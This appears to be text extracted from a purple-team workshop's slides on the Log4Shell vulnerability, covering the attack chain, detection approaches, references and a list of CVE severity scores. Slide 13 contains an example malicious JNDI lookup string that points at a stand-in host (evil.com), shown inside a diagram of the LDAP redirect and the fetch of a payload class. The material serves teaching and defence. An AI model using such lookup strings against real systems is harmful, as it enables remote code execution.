Log4j? Log4Shell? I feel like I’ve heard those terms before… Perhaps you were so bogged down with remediation and incident response that you didn’t get the necessary time to research and understand the full scope of what happened. In this hands-on talk, we’ll walk through how the vulnerability is exploited and what part it plays in the attack chain. You’ll have an opportunity to emulate the attack or follow along as I demonstrate the attack and various open-source detection methods. This talk takes a purple team approach by discussing the defender’s and attacker’s infrastructure, attack execution, and how to analyze the traffic for identification and detection. We’ll finish up by discussing the aftermath of attacks seen in the wild, current APT approaches to this vulnerability, and address any security concerns that remain. I’ll leave you with configured docker containers, detection mechanisms, and full instructions on how to emulate and detect this attack within your own environment.

4. https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html

5. https://blog.qualys.com/vulnerabilities-threat-research/2022/03/18/infographic-log4shell-vulnerability-impact-by-the-numbers

9. Library
Direct
Dependency
Indirect
Dependency
Indirect
Dependency
Indirect
Dependency
Direct
Dependency
Indirect
Dependency

10. Credit: https://twitter.com/GossiTheDog/status/1469252646745874435

11. Whatever you are logging!
• User-Agent
• X-Headers
• Body of the Request
• Etc.

12. Local or Remote
Database

13. :8080
:1389
:8888
$(jndi:ldap://evil.com/badstuff)
Malicious JNDI String
1
External Query
LDAP (or DNS/RMI)
2
Pointer (redirect) to 2nd request
Server Response
3
Malicious Java classes and code
2nd Response
5
2nd Request
HTTP(S)
4

14. JNDI Initialization
Protocol
Attacker’s Infrastructure
Payload

22. (09 Nov 2022)

23. https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/

25. https://www.cisa.gov/uscert/ncas/alerts/aa22-174a

31. Software Bill of Materials (SBOM)

34. Proprietary and confidential
Questions?
• www.devaultsecurity.com
• linkedin.
• twitter. devaultsecurity.com
• github.
• brandon-devault@pluralsight.com
• https://github.com/Oofles/Log4j-workshop
• https://app.pluralsight.com/profile/author/brandon-devault
}

36. 10 - Critical
Pub: 12/10/2021
Upd: 08/17/2022

37. 9.0 - Critical
Pub: 12/14/2021
Upd: 07/25/2022

38. 5.9 - Medium
Pub: 12/18/2021
Upd: 07/25/2022

39. 6.6 - Medium
Pub: 12/28/2021
Upd: 08/08/2022

40. 5.3 - Medium
Pub: 01/01/2022
Upd: 02/10/2022

41. 9.8 - Critical
Pub: 01/14/2022
Upd: 08/08/2022

42. 5.5 - Medium
Pub: 01/19/2022
Upd: 01/27/2022

43. 9.8 - Critical
Pub: 02/20/2022
Upd: 02/28/2022

44. 7.2 - High
Pub: 04/13/2022
Upd: 04/21/2022

45. 8.8 - High
Pub: 04/19/2022
Upd: 05/11/2022

46. 8.8 - High
Pub: 04/19/2022
Upd: 05/03/2022

47. 7.0 - High
Pub: 06/17/2022
Upd: 07/05/2022

48. 8.1 - High
Pub: 08/24/2022
Upd: 08/29/2022